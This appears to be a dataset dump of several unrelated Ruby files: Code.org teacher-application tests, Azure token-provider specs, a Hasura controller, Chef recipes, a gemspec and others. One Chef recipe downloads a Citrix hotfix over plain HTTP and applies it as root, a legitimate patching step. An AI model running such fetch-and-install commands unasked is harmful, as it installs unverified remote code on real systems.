  application = build :pd_teacher1819_application,
    response_scores: {committed: 'Yes'}.to_json
  assert_equal 'Reviewing incomplete', application.meets_criteria
end
test 'total score calculates the sum of all response scores' do
  scores = {
    free_lunch_percent: '5',
    underrepresented_minority_percent: '5',
    able_to_attend_single: TEXT_FIELDS[:able_to_attend_single],
    csp_which_grades: nil
  }
  application = build :pd_teacher1819_application, response_scores: scores.to_json

  # Only numeric entries count; text answers and nils contribute nothing.
  assert_equal 10, application.total_score
end
test 'autoscore does not override existing scores' do
application_hash = build :pd_teacher1819_application_hash, {
committed: YES,
able_to_attend_single: TEXT_FIELDS[:able_to_attend_single],
csp_which_grades: ['12'],
csp_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].first,
previous_yearlong_cdo_pd: ['CS Discoveries'],
csp_how_offer: Pd::Application::Teacher1819Application.options[:csp_how_offer].last,
taught_in_past: ['CS in Algebra']
}
application = create(:pd_teacher1819_application, course: 'csp', form_data_hash: application_hash, regional_partner: (create :regional_partner))
application.auto_score!
assert_equal(
{
regional_partner_name: YES,
committed: YES,
able_to_attend_single: YES,
csp_which_grades: YES,
csp_course_hours_per_year: YES,
previous_yearlong_cdo_pd: YES,
csp_how_offer: 2,
taught_in_past: 2
}, application.response_scores_hash
)
application.update_form_data_hash(
{
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: '50.1%',
underrepresented_minority_percent: '50.1%',
wont_replace_existing_course: Pd::Application::PrincipalApproval1819Application.options[:replace_course].second,
}
)
application.update(response_scores: application.response_scores_hash.merge({regional_partner_name: NO}).to_json)
application.auto_score!
assert_equal(
{
regional_partner_name: NO,
committed: YES,
able_to_attend_single: YES,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: 5,
underrepresented_minority_percent: 5,
wont_replace_existing_course: 5,
csp_which_grades: YES,
csp_course_hours_per_year: YES,
previous_yearlong_cdo_pd: YES,
csp_how_offer: 2,
taught_in_past: 2
}, application.response_scores_hash
)
end
test 'autoscore for a CSP application where they should get YES/Points for everything' do
application_hash = build :pd_teacher1819_application_hash, {
committed: YES,
able_to_attend_single: TEXT_FIELDS[:able_to_attend_single],
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: '50.1%',
underrepresented_minority_percent: '50.1%',
wont_replace_existing_course: Pd::Application::PrincipalApproval1819Application.options[:replace_course].second,
csp_which_grades: ['12'],
csp_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].first,
previous_yearlong_cdo_pd: ['CS Discoveries'],
csp_how_offer: Pd::Application::Teacher1819Application.options[:csp_how_offer].last,
taught_in_past: ['CS in Algebra']
}
application = create :pd_teacher1819_application, course: 'csp', form_data_hash: application_hash
application.update(regional_partner: (create :regional_partner))
application.auto_score!
assert_equal(
{
regional_partner_name: YES,
committed: YES,
able_to_attend_single: YES,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: 5,
underrepresented_minority_percent: 5,
wont_replace_existing_course: 5,
csp_which_grades: YES,
csp_course_hours_per_year: YES,
previous_yearlong_cdo_pd: YES,
csp_how_offer: 2,
taught_in_past: 2
}, application.response_scores_hash
)
end
test 'autoscore for a CSP application where they should get NO/No points for everything' do
application_hash = build :pd_teacher1819_application_hash, {
committed: Pd::Application::Teacher1819Application.options[:committed].last,
able_to_attend_single: TEXT_FIELDS[:no_explain],
principal_approval: YES,
schedule_confirmed: NO,
diversity_recruitment: NO,
free_lunch_percent: '49.9%',
underrepresented_minority_percent: '49.9%',
wont_replace_existing_course: YES,
csp_which_grades: ['12'],
csp_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].last,
previous_yearlong_cdo_pd: ['CS Principles'],
csp_how_offer: Pd::Application::Teacher1819Application.options[:csp_how_offer].first,
taught_in_past: ['AP CS A']
}
application = create :pd_teacher1819_application, course: 'csp', form_data_hash: application_hash, regional_partner: nil
application.auto_score!
assert_equal(
{
regional_partner_name: NO,
committed: NO,
able_to_attend_single: NO,
principal_approval: YES, # Keep this as yes to test additional fields
schedule_confirmed: NO,
diversity_recruitment: NO,
free_lunch_percent: 0,
underrepresented_minority_percent: 0,
wont_replace_existing_course: nil,
csp_which_grades: YES, # Not possible to select responses for which this would be No
csp_course_hours_per_year: NO,
previous_yearlong_cdo_pd: NO,
csp_how_offer: 0,
taught_in_past: 0
}, application.response_scores_hash
)
end
test 'autoscore for a CSD application where they should get YES/Points for everything' do
application_hash = build(:pd_teacher1819_application_hash, :csd,
committed: YES,
able_to_attend_single: TEXT_FIELDS[:able_to_attend_single],
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: '50.1%',
underrepresented_minority_percent: '50.1%',
wont_replace_existing_course: Pd::Application::PrincipalApproval1819Application.options[:replace_course].second,
csd_which_grades: ['10', '11'],
csd_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].first,
previous_yearlong_cdo_pd: ['CS in Science'],
taught_in_past: Pd::Application::Teacher1819Application.options[:taught_in_past].last
)
application = create :pd_teacher1819_application, course: 'csd', form_data_hash: application_hash
application.update(regional_partner: (create :regional_partner))
application.auto_score!
assert_equal(
{
regional_partner_name: YES,
committed: YES,
able_to_attend_single: YES,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: 5,
underrepresented_minority_percent: 5,
wont_replace_existing_course: 5,
csd_which_grades: YES,
csd_course_hours_per_year: YES,
previous_yearlong_cdo_pd: YES,
taught_in_past: 2
}, application.response_scores_hash
)
end
test 'autoscore for a CSD application where they should get NO/No points for everything' do
application_hash = build(:pd_teacher1819_application_hash, :csd,
committed: Pd::Application::Teacher1819Application.options[:committed].last,
able_to_attend_single: TEXT_FIELDS[:no_explain],
principal_approval: YES,
schedule_confirmed: NO,
diversity_recruitment: NO,
free_lunch_percent: '49.9%',
underrepresented_minority_percent: '49.9%',
wont_replace_existing_course: YES,
csd_which_grades: ['12'],
csd_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].last,
previous_yearlong_cdo_pd: ['Exploring Computer Science'],
taught_in_past: ['Exploring Computer Science']
)
application = create :pd_teacher1819_application, course: 'csd', form_data_hash: application_hash, regional_partner: nil
application.auto_score!
assert_equal(
{
regional_partner_name: NO,
committed: NO,
able_to_attend_single: NO,
principal_approval: YES, # Keep this as yes to test additional fields
schedule_confirmed: NO,
diversity_recruitment: NO,
free_lunch_percent: 0,
underrepresented_minority_percent: 0,
wont_replace_existing_course: nil,
csd_which_grades: NO,
csd_course_hours_per_year: NO,
previous_yearlong_cdo_pd: NO,
taught_in_past: 0
}, application.response_scores_hash
)
end
test 'autoscore for able_to_attend_multiple' do
application_hash = build :pd_teacher1819_application_hash, :with_multiple_workshops, :csd
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: nil
application.auto_score!
assert_equal(YES, application.response_scores_hash[:able_to_attend_multiple])
end
test 'autoscore for ambiguous responses to able_to_attend_multiple' do
application_hash = build(:pd_teacher1819_application_hash, :csd, :with_multiple_workshops,
able_to_attend_multiple: [
"December 11-15, 2017 in Indiana, USA",
TEXT_FIELDS[:no_explain]
]
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: nil
application.auto_score!
assert_nil application.response_scores_hash[:able_to_attend_multiple]
end
test 'autoscore for not able_to_attend_multiple' do
application_hash = build(:pd_teacher1819_application_hash, :csd, :with_multiple_workshops,
program: Pd::Application::Teacher1819Application::PROGRAM_OPTIONS.first,
able_to_attend_multiple: [TEXT_FIELDS[:no_explain]]
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: nil
application.auto_score!
assert_equal(NO, application.response_scores_hash[:able_to_attend_multiple])
end
test 'application meets criteria if able to attend single workshop' do
application_hash = build(:pd_teacher1819_application_hash,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: (create :regional_partner)
application.auto_score!
assert_equal(YES, application.meets_criteria)
end
test 'application meets criteria if able to attend multiple workshops' do
application_hash = build(:pd_teacher1819_application_hash, :with_multiple_workshops,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: (create :regional_partner)
application.auto_score!
assert_equal(YES, application.meets_criteria)
end
test 'application does not meet criteria if unable to attend single workshop' do
application_hash = build(:pd_teacher1819_application_hash,
able_to_attend_single: [TEXT_FIELDS[:no_explain]],
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: (create :regional_partner)
application.auto_score!
assert_equal(NO, application.meets_criteria)
end
test 'application does not meet criteria if unable to attend multiple workshops' do
application_hash = build(:pd_teacher1819_application_hash, :with_multiple_workshops,
able_to_attend_multiple: [TEXT_FIELDS[:no_explain]],
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: (create :regional_partner)
application.auto_score!
assert_equal(NO, application.meets_criteria)
end
test 'accepted_at updates times' do
  first_day = Date.today.to_time
  second_day = Date.tomorrow.to_time
  application = create :pd_teacher1819_application
  assert_nil application.accepted_at

  Timecop.freeze(first_day) do
    # Entering accepted stamps the time; leaving accepted clears it.
    application.update!(status: 'accepted')
    assert_equal first_day, application.accepted_at.to_time

    application.update!(status: 'declined')
    assert_nil application.accepted_at
  end

  Timecop.freeze(second_day) do
    # Re-accepting stamps the new acceptance time.
    application.update!(status: 'accepted')
    assert_equal second_day, application.accepted_at.to_time
  end
end
test 'find_default_workshop finds no workshop for applications without a regional partner' do
application = build :pd_teacher1819_application
assert_nil application.find_default_workshop
end
test 'find_default_workshop finds a teachercon workshop for applications with a G3 partner' do
# stub process_location to prevent making Geocoder requests in test
Pd::Workshop.any_instance.stubs(:process_location)
teachercon_workshops = {}
[Pd::Workshop::COURSE_CSD, Pd::Workshop::COURSE_CSP].each do |course|
TEACHERCONS.each do |teachercon|
city = teachercon[:city]
teachercon_workshops[[course, city]] = create :pd_workshop,
num_sessions: 1, course: course, subject: Pd::Workshop::SUBJECT_TEACHER_CON, location_address: city
end
end
g3_partner_name = REGIONAL_PARTNER_TC_MAPPING.keys.sample
g3_partner = build :regional_partner, group: 3, name: g3_partner_name
application = build :pd_teacher1819_application, regional_partner: g3_partner
[Pd::Workshop::COURSE_CSD, Pd::Workshop::COURSE_CSP].each do |course|
city = get_matching_teachercon(g3_partner)[:city]
workshop = teachercon_workshops[[course, city]]
application.course = course === Pd::Workshop::COURSE_CSD ? 'csd' : 'csp'
assert_equal workshop, application.find_default_workshop
end
end
test 'find_default_workshop find an appropriate partner workshop for G1 and G2 partners' do
partner = create :regional_partner
program_manager = create :program_manager, regional_partner: partner
# where "appropriate workshop" is the earliest teachercon or local summer
# workshop matching the application course.
invalid_workshop = create :pd_workshop, organizer: program_manager
create :pd_session,
workshop: invalid_workshop,
start: Date.new(2018, 1, 10)
earliest_valid_workshop = create :pd_workshop, :local_summer_workshop, organizer: program_manager
create :pd_session,
workshop: earliest_valid_workshop,
start: Date.new(2018, 1, 15)
latest_valid_workshop = create :pd_workshop, :local_summer_workshop, organizer: program_manager
create :pd_session,
workshop: latest_valid_workshop,
start: Date.new(2018, 12, 15)
application = build :pd_teacher1819_application, course: 'csp', regional_partner: partner
assert_equal earliest_valid_workshop, application.find_default_workshop
end
test 'locking an application with pd_workshop_id automatically enrolls user' do
application = create :pd_teacher1819_application
workshop = create :pd_workshop
application.pd_workshop_id = workshop.id
application.status = "accepted"
assert_creates(Pd::Enrollment) do
application.lock!
end
assert_equal Pd::Enrollment.last.workshop, workshop
assert_equal Pd::Enrollment.last.id, application.auto_assigned_enrollment_id
end
test 'updating and re-locking an application with an auto-assigned enrollment will delete old enrollment' do
application = create :pd_teacher1819_application
first_workshop = create :pd_workshop
second_workshop = create :pd_workshop
application.pd_workshop_id = first_workshop.id
application.status = "accepted"
application.lock!
first_enrollment = Pd::Enrollment.find(application.auto_assigned_enrollment_id)
application.unlock!
application.pd_workshop_id = second_workshop.id
application.lock!
assert first_enrollment.reload.deleted?
assert_not_equal first_enrollment.id, application.auto_assigned_enrollment_id
end
test 'updating the application to unaccepted will also delete the autoenrollment' do
application = create :pd_teacher1819_application
workshop = create :pd_workshop
application.pd_workshop_id = workshop.id
application.status = "accepted"
application.lock!
first_enrollment = Pd::Enrollment.find(application.auto_assigned_enrollment_id)
application.unlock!
application.status = "waitlisted"
application.lock!
assert first_enrollment.reload.deleted?
application.unlock!
application.status = "accepted"
assert_creates(Pd::Enrollment) do
application.lock!
end
assert_not_equal first_enrollment.id, application.auto_assigned_enrollment_id
end
test 'school_info_attr for specific school' do
school = create :school
form_data_hash = build :pd_teacher1819_application_hash, school: school
application = create :pd_teacher1819_application, form_data_hash: form_data_hash
assert_equal({school_id: school.id}, application.school_info_attr)
end
test 'school_info_attr for custom school' do
application = create :pd_teacher1819_application, form_data_hash: (
build :pd_teacher1819_application_hash,
:with_custom_school,
school_name: 'Code.org',
school_address: '1501 4th Ave',
school_city: 'Seattle',
school_state: 'Washington',
school_zip_code: '98101',
school_type: 'Public school'
)
assert_equal(
{
country: 'US',
school_type: 'public',
state: 'Washington',
zip: '98101',
school_name: 'Code.org',
full_address: '1501 4th Ave',
validation_type: SchoolInfo::VALIDATION_NONE
},
application.school_info_attr
)
end
test 'update_user_school_info with specific school overwrites user school info' do
user = create :teacher, school_info: create(:school_info)
application_school_info = create :school_info
application = create :pd_teacher1819_application, user: user, form_data_hash: (
build :pd_teacher1819_application_hash, school: application_school_info.school
)
application.update_user_school_info!
assert_equal application_school_info, user.school_info
end
test 'update_user_school_info with custom school does nothing when the user already a specific school' do
original_school_info = create :school_info
user = create :teacher, school_info: original_school_info
application = create :pd_teacher1819_application, user: user, form_data_hash: (
build :pd_teacher1819_application_hash, :with_custom_school
)
application.update_user_school_info!
assert_equal original_school_info, user.school_info
end
test 'update_user_school_info with custom school updates user info when user does not have a specific school' do
original_school_info = create :school_info_us_other
user = create :teacher, school_info: original_school_info
application = create :pd_teacher1819_application, user: user, form_data_hash: (
build :pd_teacher1819_application_hash, :with_custom_school
)
application.update_user_school_info!
refute_equal original_school_info.id, user.school_info_id
assert_not_nil user.school_info_id
end
test 'get_first_selected_workshop single local workshop' do
workshop = create :pd_workshop
application = create :pd_teacher1819_application, form_data_hash: (
build :pd_teacher1819_application_hash, regional_partner_workshop_ids: [workshop.id]
)
assert_equal workshop, application.get_first_selected_workshop
end
test 'get_first_selected_workshop multiple local workshops' do
workshops = (1..3).map {|i| create :pd_workshop, num_sessions: 2, sessions_from: Date.today + i, location_address: %w(tba TBA tba)[i - 1]}
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: workshops.map(&:id),
able_to_attend_multiple: (
# Select all but the first. Expect the first selected to be returned below
workshops[1..-1].map do |workshop|
"#{workshop.friendly_date_range} in #{workshop.location_address} hosted by Code.org"
end
)
)
)
assert_equal workshops[1], application.get_first_selected_workshop
end
test 'get_first_selected_workshop multiple local workshops no selection returns first' do
workshops = (1..2).map {|i| create :pd_workshop, num_sessions: 2, sessions_from: Date.today + i}
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: workshops.map(&:id),
able_to_attend_multiple: []
)
)
assert_equal workshops.first, application.get_first_selected_workshop
end
test 'get_first_selected_workshop with no workshops returns nil' do
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: []
)
)
assert_nil application.get_first_selected_workshop
end
test 'get_first_selected_workshop returns nil for teachercon even with local workshops' do
workshop = create :pd_workshop
application = create :pd_teacher1819_application, form_data_hash: (
build :pd_teacher1819_application_hash, teachercon: TC_PHOENIX, regional_partner_workshop_ids: [workshop.id]
)
assert_nil application.get_first_selected_workshop
end
test 'get_first_selected_workshop ignores single deleted workshops' do
workshop = create :pd_workshop
application = create :pd_teacher1819_application, form_data_hash: (
build :pd_teacher1819_application_hash, regional_partner_workshop_ids: [workshop.id]
)
workshop.destroy
assert_nil application.get_first_selected_workshop
end
test 'get_first_selected_workshop ignores deleted workshop from multiple list' do
workshops = (1..2).map {|i| create :pd_workshop, num_sessions: 2, sessions_from: Date.today + i}
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: workshops.map(&:id),
able_to_attend_multiple: []
)
)
workshops[0].destroy
assert_equal workshops[1], application.get_first_selected_workshop
workshops[1].destroy
assert_nil application.get_first_selected_workshop
end
test 'get_first_selected_workshop picks correct workshop even when multiple are on the same day' do
workshop_1 = create :pd_workshop, num_sessions: 2, sessions_from: Date.today + 2
workshop_2 = create :pd_workshop, num_sessions: 2, sessions_from: Date.today + 2
workshop_1.update_column(:location_address, 'Location 1')
workshop_2.update_column(:location_address, 'Location 2')
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: [workshop_1.id, workshop_2.id],
able_to_attend_multiple: ["#{workshop_2.friendly_date_range} in Location 2 hosted by Code.org"]
)
)
assert_equal workshop_2, application.get_first_selected_workshop
application_2 = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: [workshop_1.id, workshop_2.id],
able_to_attend_multiple: ["#{workshop_2.friendly_date_range} in Location 1 hosted by Code.org"]
)
)
assert_equal workshop_1, application_2.get_first_selected_workshop
end
test 'assign_default_workshop! saves the default workshop' do
application = create :pd_teacher1819_application
workshop = create :pd_workshop
application.expects(:find_default_workshop).returns(workshop)
application.assign_default_workshop!
assert_equal workshop.id, application.reload.pd_workshop_id
end
test 'assign_default_workshop! does nothing when a workshop is already assigned' do
workshop = create :pd_workshop
application = create :pd_teacher1819_application, pd_workshop_id: workshop.id
application.expects(:find_default_workshop).never
application.assign_default_workshop!
assert_equal workshop.id, application.reload.pd_workshop_id
end
test 'can_see_locked_status?' do
teacher = create :teacher
g1_program_manager = create :program_manager, regional_partner: create(:regional_partner, group: 1)
g3_program_manager = create :program_manager, regional_partner: create(:regional_partner, group: 3)
workshop_admin = create :workshop_admin
refute Teacher1819Application.can_see_locked_status?(teacher)
refute Teacher1819Application.can_see_locked_status?(g1_program_manager)
assert Teacher1819Application.can_see_locked_status?(g3_program_manager)
assert Teacher1819Application.can_see_locked_status?(workshop_admin)
end
test 'locked status appears in csv only when the supplied user can_see_locked_status' do
application = create :pd_teacher1819_application
mock_user = mock
Teacher1819Application.stubs(:can_see_locked_status?).returns(false)
header_without_locked = Teacher1819Application.csv_header('csf', mock_user)
refute header_without_locked.include? 'Locked'
row_without_locked = application.to_csv_row(mock_user)
assert_equal CSV.parse(header_without_locked).length, CSV.parse(row_without_locked).length,
"Expected header and row to have the same number of columns, excluding Locked"
Teacher1819Application.stubs(:can_see_locked_status?).returns(true)
header_with_locked = Teacher1819Application.csv_header('csf', mock_user)
assert header_with_locked.include? 'Locked'
row_with_locked = application.to_csv_row(mock_user)
assert_equal CSV.parse(header_with_locked).length, CSV.parse(row_with_locked).length,
"Expected header and row to have the same number of columns, including Locked"
end
test 'to_cohort_csv' do
application = build :pd_teacher1819_application
optional_columns = {registered_workshop: false, accepted_teachercon: true}
assert (header = Teacher1819Application.cohort_csv_header(optional_columns))
assert (row = application.to_cohort_csv_row(optional_columns))
assert_equal CSV.parse(header).length, CSV.parse(row).length,
"Expected header and row to have the same number of columns"
end
test 'school cache' do
school = create :school
form_data_hash = build :pd_teacher1819_application_hash, school: school
application = create :pd_teacher1819_application, form_data_hash: form_data_hash
# Original query: School, SchoolDistrict
assert_queries 2 do
assert_equal school.name.titleize, application.school_name
assert_equal school.school_district.name.titleize, application.district_name
end
# Cached
assert_queries 0 do
assert_equal school.name.titleize, application.school_name
assert_equal school.school_district.name.titleize, application.district_name
end
end
test 'cache prefetch' do
school = create :school
workshop = create :pd_workshop
form_data_hash = build :pd_teacher1819_application_hash, school: school
application = create :pd_teacher1819_application, form_data_hash: form_data_hash, pd_workshop_id: workshop.id
# Workshop, Session, Enrollment, School, SchoolDistrict
assert_queries 5 do
Teacher1819Application.prefetch_associated_models([application])
end
assert_queries 0 do
assert_equal school.name.titleize, application.school_name
assert_equal school.school_district.name.titleize, application.district_name
assert_equal workshop, application.workshop
end
end
test 'memoized filtered_labels' do
Teacher1819Application::FILTERED_LABELS.clear
filtered_labels_csd = Teacher1819Application.filtered_labels('csd')
assert filtered_labels_csd.include? :csd_which_grades
refute filtered_labels_csd.include? :csp_which_grades
assert_equal ['csd'], Teacher1819Application::FILTERED_LABELS.keys
filtered_labels_csd = Teacher1819Application.filtered_labels('csp')
refute filtered_labels_csd.include? :csd_which_grades
assert filtered_labels_csd.include? :csp_which_grades
assert_equal ['csd', 'csp'], Teacher1819Application::FILTERED_LABELS.keys
end
end
end
| 41.350682 | 150 | 0.723374 |
6a9a80f5adfd85a7feda097b1d398cd57ab96673 | 2,732 | # encoding: utf-8
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
require 'rspec'
require 'ms_rest_azure'
module MsRestAzure
describe MSITokenProvider do
it 'should throw error if nil data is passed into constructor' do
expect { MSITokenProvider.new(50431,nil) }.to raise_error(ArgumentError)
end
it 'should set defaults for managed service identity' do
azure_cloud = MsRestAzure::AzureEnvironments::AzureCloud
token_provider = MSITokenProvider.new
token_expires_on = token_provider.token_expires_on
token_type = token_provider.token_type
token = token_provider.token
expect(token_provider.send(:port)).to eq(50342)
settings = token_provider.send(:settings)
expect(settings.authentication_endpoint).to eq(azure_cloud.active_directory_endpoint_url)
expect(settings.token_audience).to eq(azure_cloud.active_directory_resource_id)
end
it 'should set customs for managed service identity' do
port = 50333
settings = ActiveDirectoryServiceSettings.new()
settings.authentication_endpoint = 'https://login.microsoftonline.com/'
settings.token_audience = 'https://vault.azure.net'
token_provider = MSITokenProvider.new(port, settings)
expect(token_provider.send(:port)).to eq(port)
settings = token_provider.send(:settings)
expect(settings.authentication_endpoint).to eq(settings.authentication_endpoint)
expect(settings.token_audience).to eq(settings.token_audience)
end
it 'should throw error if more than one value is passed to msi_id' do
expect { MSITokenProvider.new(50342, ActiveDirectoryServiceSettings.get_azure_settings, {:client_id => '1234', :object_id => '5678'}) }.to raise_error(ArgumentError)
end
it 'should set msi_id for user assigned identity - using client_id' do
id = '1234'
token_provider = MSITokenProvider.new(50342, ActiveDirectoryServiceSettings.get_azure_settings, {:client_id => id})
expect(token_provider.send('client_id')).to eq(id)
end
it 'should set msi_id for user assigned identity - using object_id' do
id = '1234'
token_provider = MSITokenProvider.new(50342, ActiveDirectoryServiceSettings.get_azure_settings, {:object_id => id})
expect(token_provider.send('object_id')).to eq(id)
end
it 'should set msi_id for user assigned identity - using msi_res_id' do
id = '1234'
token_provider = MSITokenProvider.new(50342, ActiveDirectoryServiceSettings.get_azure_settings, {:msi_res_id => id})
expect(token_provider.send('msi_res_id')).to eq(id)
end
end
end
| 41.393939 | 171 | 0.739019 |
622037a2338d49b5b32e51c75a4f4d81528c280b | 1,194 | #
# Cookbook Name:: xs_maintenance
# Recipe:: hotfix-XS62ESP1004
#
# Copyright (C) 2014 Todd Pigram
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# CVE-2015-4106, CVE-2015-4163, CVE-2015-4164, CVE-2015-2756, CVE-2015-4103, CVE-2015-4104, CVE-2015-4105
bash "install XS65ESP1004" do
user "root"
cwd "/tmp"
code <<-EOH
mkdir -p /tmp/hotfixes
cd /tmp/hotfixes
wget http://downloadns.citrix.com.edgesuite.net/10663/XS65ESP1004.zip
unzip XS65ESP1004.zip
. /etc/xensource-inventory
PATCHUUID=$(xe patch-upload file-name=XS65ESP1004.xsupdate)
xe patch-pool-apply uuid=${PATCHUUID}
xe patch-clean uuid=${PATCHUUID}
EOH
not_if {::File.exists?(node['xs65sp1']['004'])}
end | 30.615385 | 105 | 0.735343 |
ff4a39a77e9d30cb5808a6d7911ffc173b03aa2c | 1,320 | require_relative 'lib/slack_app/version'
Gem::Specification.new do |spec|
spec.name = "slack_app"
spec.version = SlackApp::VERSION
spec.authors = ["Gerry Larios"]
spec.email = ["[email protected]"]
spec.summary = %q{A Ruby wrapper for the Slack Api. Block kit included.}
spec.description = %q{A Ruby wrapper for the Slack Api. Block kit included.}
spec.homepage = "https://github.com/GerryLarios/slack-app-gem"
spec.license = "MIT"
spec.required_ruby_version = Gem::Requirement.new(">= 2.3.0")
spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "https://github.com/GerryLarios/slack-app-gem"
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
# Dependencies
spec.add_runtime_dependency 'httparty', '~> 0.18.1'
end
| 41.25 | 87 | 0.661364 |
e8c69ae8546bc33788410d6b03fa9340a8caf1d6 | 837 | require_dependency "hasura_handler/application_controller"
module HasuraHandler
class AuthHookController < ApplicationController
def get_mode
@headers = clean_headers
authenticate
end
def post_mode
@headers = raw_params['headers'].
to_h.
map{ |k,v| [standardize_header(k), v] }.
to_h
authenticate
end
private
def authenticate
@authenticator = HasuraHandler.
authenticator.
to_s.
constantize.
new(@headers)
if @authenticator.success?
render json: @authenticator.response, status: 200
else
render json: { error: true, message: @authenticator.error_message }, status: 401
end
end
def standardize_header(header)
"HTTP_#{header.to_s.gsub('-', '_').upcase}"
end
end
end
| 20.925 | 88 | 0.630824 |
6ac9aa2fedec2214484c0bc13aac15503c07a8b5 | 763 | execute 'apt-get update' if platform_family?('debian')
splunk_app 'bistro' do
splunk_auth 'admin:notarealpassword'
cookbook_file 'bistro-1.0.2.spl'
checksum '862e2c4422eee93dd50bd93aa73a44045d02cb6232f971ba390a2f1c15bdb79f'
action [:install, :enable]
end
splunk_app 'bistro-disable' do
app_name 'bistro'
splunk_auth 'admin:notarealpassword'
action [:disable, :remove]
end
splunk_app 'sanitycheck' do
remote_directory 'sanitycheck'
splunk_auth 'admin:notarealpassword'
action :install
end
splunk_app 'bistro-remote-file' do
app_name 'bistro-1.0.2'
remote_file 'https://github.com/ampledata/bistro/archive/1.0.2.tar.gz'
splunk_auth 'admin:notarealpassword'
templates ['inputs.conf']
app_dependencies ['ruby']
action :install
end
| 25.433333 | 77 | 0.771953 |
6ae9a1bbdce7d5f538a8a349be601b69a0f78514 | 1,433 | require "shogi_koma/painter"
require "cairo"
class PainterTest < Test::Unit::TestCase
def setup
@painter = ShogiKoma::Painter.new
end
class SetFontTest < self
def test_found
part_of_name = "M"
assert_match(/#{part_of_name}/, @painter.set_font(part_of_name))
end
def test_not_found
part_of_name = "ABCDE12345"
assert_nil(@painter.set_font(part_of_name))
end
end
class DrawTest < self
def test_one_character
assert_nothing_raised_in_draw("A")
end
def test_two_characters
assert_nothing_raised_in_draw("AB")
end
def test_three_characters
assert_nothing_raised_in_draw("ABC")
end
def test_body_color_with_rgb
@painter.set_body_rgb(0.2, 0.2, 0.2)
assert_nothing_raised_in_draw("D")
end
def test_text_color_with_name
@painter.set_text_color(:deep_pink)
assert_nothing_raised_in_draw("E")
end
def test_text_color_with_hex
@painter.set_text_color("#ACE")
assert_nothing_raised_in_draw("G")
end
private
def assert_nothing_raised_in_draw(text)
width = 200
height = 200
assert_nothing_raised do
Cairo::ImageSurface.new(:argb32, width, height) do |surface|
Cairo::Context.new(surface) do |context|
context.scale(width, height)
@painter.draw(context, text)
end
end
end
end
end
end
| 22.390625 | 70 | 0.667132 |
bb266d406e50390afb9371c5a20b772f2d4d252f | 85 | require "airesis_i18n/engine"
require "airesis_i18n/version"
module AiresisI18n
end
| 14.166667 | 30 | 0.835294 |
ff0482067332996a89b61ed85cff872539c4f3b3 | 171 | module Payments
class NotUsersFriendshipError < StandardError
def initialize(msg = I18n.t('api.errors.payments.not_users_friendship'))
super
end
end
end
| 21.375 | 76 | 0.74269 |
7a8a48b62c3c3331b2c0fa2c9719b772b3fe85e3 | 458 | cask 'musescore' do
version '2.0.3.1'
sha256 'a166a21bf6259331a42b3a5ed73cfb69f653095a27a676fbf94a747d98153b29'
# ftp.osuosl.org/pub/musescore was verified as official when first introduced to the cask
url "https://ftp.osuosl.org/pub/musescore/releases/MuseScore-#{version.major_minor_patch}/MuseScore-#{version}.dmg"
name 'MuseScore'
homepage 'https://musescore.org/'
depends_on macos: '>= :lion'
app "MuseScore #{version.major}.app"
end
| 32.714286 | 117 | 0.759825 |
f85422d032aef5a711d8efb024b1855465e1acb5 | 2,027 | require('rspec')
require('word_freq')
describe('String#word_freq') do
